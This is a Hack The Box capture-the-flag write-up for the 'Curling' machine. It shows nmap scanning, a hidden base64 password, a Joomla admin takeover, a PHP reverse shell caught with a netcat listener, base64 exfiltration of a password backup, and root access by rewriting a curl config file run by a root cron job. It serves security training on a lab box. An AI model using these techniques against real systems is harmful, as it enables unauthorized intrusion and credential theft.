Hack The Box - Curling

3 minute read

CurlingImage


Summary


This machine had some CTF elements to it, but overall wasn’t that difficult to complete through proper enumeration. It highlights some issues which may be present when creating tasks which frequently execute with root privileges.

Gaining Access

  • Find reference to secret.txt file, base64 decode contents
  • Find reference to user based on posting
  • Logon as Joomla administrator
  • Upload reverse shell
  • Find and exfiltrate password_backup file, reassemble as password
  • SSH in as user

Elevating Privileges

  • Find curl process running as administrator
  • Modify file with weak access permissions
  • View output report

Write-up


Port Enumeration

# Nmap 7.70 scan initiated Sun Oct 28 17:36:43 2018 as: nmap -sC -sV -oA nmap 10.10.10.150
Nmap scan report for 10.10.10.150
Host is up (0.57s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 28 17:38:59 2018 -- 1 IP address (1 host up) scanned in 136.76 seconds

Find reference to secret.txt file, base64 decode contents

Curling the webpage revealed an item of interest, a reference to secret.txt

curl 10.10.10.150
<!-- Footer -->
	<footer class="footer" role="contentinfo">
		<div class="container">
			<hr />
			
			<p class="pull-right">
				<a href="#top" id="back-top">
					Back to Top				</a>
			</p>
			<p>
				&copy; 2018 Cewl Curling site!			</p>
		</div>
	</footer>
	
</body>
      <!-- secret.txt -->
</html>

!– secret.txt –>

Trying to open the file revealed an interesting string.

http://10.10.10.150/secret.txt Q3VybGluZzIwMTgh

After base64 decoding this it looked like a password

cat secret.txt | base64 -d Curling2018!

Find reference to user based on posting

The webpage had a post which had been signed off as Floris, using this and the password obtained I was able to log onto the Joomla interface located at /administrator.

http://10.10.10.150/administrator/

Logon as Joomla administrator

Enter password:

floris
Curling2018!

Upload reverse shell

At this point I could either install the file upload plugin OR modify a template to be a PHP shell. I took the latter under Extenstions > Templates > Templates and modified it with the Pentest Monkey Reverse Shell

I caught this connection using netcat.

nc -nlvp 8080

Upon catching the connection I looked around and found a password_backup file.

Find and exfiltrate password_backup file reassemble as password

I Base64 encoded this file for exfiltration, and copied the output.

base64 password_backup
MDAwMDAwMDA6IDQyNWEgNjgzOSAzMTQxIDU5MjYgNTM1OSA4MTliIGJiNDggMDAwMCAgQlpoOTFB
WSZTWS4uLkguLgowMDAwMDAxMDogMTdmZiBmZmZjIDQxY2YgMDVmOSA1MDI5IDYxNzYgNjFjYyAz
YTM0ICAuLi4uQS4uLlApYXZhLjo0CjAwMDAwMDIwOiA0ZWRjIGNjY2MgNmUxMSA1NDAwIDIzYWIg
NDAyNSBmODAyIDE5NjAgIE4uLi5uLlQuIy5AJS4uLmAKMDAwMDAwMzA6IDIwMTggMGNhMCAwMDky
IDFjN2EgODM0MCAwMDAwIDAwMDAgMDAwMCAgIC4uLi4uLnouQC4uLi4uLgowMDAwMDA0MDogMDY4
MCA2OTg4IDM0NjggNjQ2OSA4OWE2IGQ0MzkgZWE2OCBjODAwICAuLmkuNGhkaS4uLjkuaC4uCjAw
MDAwMDUwOiAwMDBmIDUxYTAgMDA2NCA2ODFhIDA2OWUgYTE5MCAwMDAwIDAwMzQgIC4uUS4uZGgu
Li4uLi4uLjQKMDAwMDAwNjA6IDY5MDAgMDc4MSAzNTAxIDZlMTggYzJkNyA4Yzk4IDg3NGEgMTNh
MCAgaS4uLjUubi4uLi4uLkouLgowMDAwMDA3MDogMDg2OCBhZTE5IGMwMmEgYjBjMSA3ZDc5IDJl
YzIgM2M3ZSA5ZDc4ICAuaC4uLiouLn15Li48fi54CjAwMDAwMDgwOiBmNTNlIDA4MDkgZjA3MyA1
NjU0IGMyN2EgNDg4NiBkZmEyIGU5MzEgIC4+Li4uc1ZULnpILi4uLjEKMDAwMDAwOTA6IGM4NTYg
OTIxYiAxMjIxIDMzODUgNjA0NiBhMmRkIGMxNzMgMGQyMiAgLlYuLi4hMy5gRi4uLnMuIgowMDAw
MDBhMDogYjk5NiA2ZWQ0IDBjZGIgODczNyA2YTNhIDU4ZWEgNjQxMSA1MjkwICAuLm4uLi4uN2o6
WC5kLlIuCjAwMDAwMGIwOiBhZDZiIGIxMmYgMDgxMyA4MTIwIDgyMDUgYTVmNSAyOTcwIGM1MDMg
IC5rLi8uLi4gLi4uLilwLi4KMDAwMDAwYzA6IDM3ZGIgYWIzYiBlMDAwIGVmODUgZjQzOSBhNDE0
IDg4NTAgMTg0MyAgNy4uOy4uLi4uOS4uLlAuQwowMDAwMDBkMDogODI1OSBiZTUwIDA5ODYgMWU0
OCA0MmQ1IDEzZWEgMWMyYSAwOThjICAuWS5QLi4uSEIuLi4uKi4uCjAwMDAwMGUwOiA4YTQ3IGFi
MWQgMjBhNyA1NTQwIDcyZmYgMTc3MiA0NTM4IDUwOTAgIC5HLi4gLlVAci4uckU4UC4KMDAwMDAw
ZjA6IDgxOWIgYmI0OCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLi4uSAo=

On my own machine I base64 decoded the string to retrieve original bzip file.

echo "MDAwMDAwMDA6IDQyNWEgNjgzOSAzMTQxIDU5MjYgNTM1OSA4MTliIGJiNDggMDAwMCAgQlpoOTFB
WSZTWS4uLkguLgowMDAwMDAxMDogMTdmZiBmZmZjIDQxY2YgMDVmOSA1MDI5IDYxNzYgNjFjYyAz
YTM0ICAuLi4uQS4uLlApYXZhLjo0CjAwMDAwMDIwOiA0ZWRjIGNjY2MgNmUxMSA1NDAwIDIzYWIg
NDAyNSBmODAyIDE5NjAgIE4uLi5uLlQuIy5AJS4uLmAKMDAwMDAwMzA6IDIwMTggMGNhMCAwMDky
IDFjN2EgODM0MCAwMDAwIDAwMDAgMDAwMCAgIC4uLi4uLnouQC4uLi4uLgowMDAwMDA0MDogMDY4
MCA2OTg4IDM0NjggNjQ2OSA4OWE2IGQ0MzkgZWE2OCBjODAwICAuLmkuNGhkaS4uLjkuaC4uCjAw
MDAwMDUwOiAwMDBmIDUxYTAgMDA2NCA2ODFhIDA2OWUgYTE5MCAwMDAwIDAwMzQgIC4uUS4uZGgu
Li4uLi4uLjQKMDAwMDAwNjA6IDY5MDAgMDc4MSAzNTAxIDZlMTggYzJkNyA4Yzk4IDg3NGEgMTNh
MCAgaS4uLjUubi4uLi4uLkouLgowMDAwMDA3MDogMDg2OCBhZTE5IGMwMmEgYjBjMSA3ZDc5IDJl
YzIgM2M3ZSA5ZDc4ICAuaC4uLiouLn15Li48fi54CjAwMDAwMDgwOiBmNTNlIDA4MDkgZjA3MyA1
NjU0IGMyN2EgNDg4NiBkZmEyIGU5MzEgIC4+Li4uc1ZULnpILi4uLjEKMDAwMDAwOTA6IGM4NTYg
OTIxYiAxMjIxIDMzODUgNjA0NiBhMmRkIGMxNzMgMGQyMiAgLlYuLi4hMy5gRi4uLnMuIgowMDAw
MDBhMDogYjk5NiA2ZWQ0IDBjZGIgODczNyA2YTNhIDU4ZWEgNjQxMSA1MjkwICAuLm4uLi4uN2o6
WC5kLlIuCjAwMDAwMGIwOiBhZDZiIGIxMmYgMDgxMyA4MTIwIDgyMDUgYTVmNSAyOTcwIGM1MDMg
IC5rLi8uLi4gLi4uLilwLi4KMDAwMDAwYzA6IDM3ZGIgYWIzYiBlMDAwIGVmODUgZjQzOSBhNDE0
IDg4NTAgMTg0MyAgNy4uOy4uLi4uOS4uLlAuQwowMDAwMDBkMDogODI1OSBiZTUwIDA5ODYgMWU0
OCA0MmQ1IDEzZWEgMWMyYSAwOThjICAuWS5QLi4uSEIuLi4uKi4uCjAwMDAwMGUwOiA4YTQ3IGFi
MWQgMjBhNyA1NTQwIDcyZmYgMTc3MiA0NTM4IDUwOTAgIC5HLi4gLlVAci4uckU4UC4KMDAwMDAw
ZjA6IDgxOWIgYmI0OCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLi4uSAo=" | base64 -d > password_backup

I then used xxd to reassemble the hex back into the original bzip file.

xxd -r password_backup > file.bz2

Decompress hidden bzip file

bzip2 -d file.bz2

SSH in as user

This revealed a password which was able to be used to SSH into the box.

5d<wdCbdZu) hChXll
ssh [email protected]	
5d<wdCbdZu)|hChXll

Gaining Access

I had now got user privileges.

cat user.txt 

User.txt: 65dd1 … 8530b


Find curl process running as administrator

I was able to find an entry while monitoring processes which shed some light on a possible privilege escalation vector, as it turns out a curl command was executing consistently as root.

ps -aux
/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

As a side note, pspy is a nice tool for monitoring and snooping on processes executing on linux. pspy github page

By first going to the admin area

cd /home/floris/admin-area/

Modify file with weak access permissions

I was then able to modify the input file specified in the curl command so that it would curl the root txt file and spit it out to the report file.

echo 'url = "file:///root/root.txt"' > input

View output report

After waiting for the process to kick in I was able to read and modify arbitrary files.

cat report

Elevating Privileges


root.txt: 82c19 … 6064a


Final Notes

At the time of writing other HTB members had rated the machine elements as shown below. Feel free to reach out and provide any feedback or let me know if this helped.

Heatmap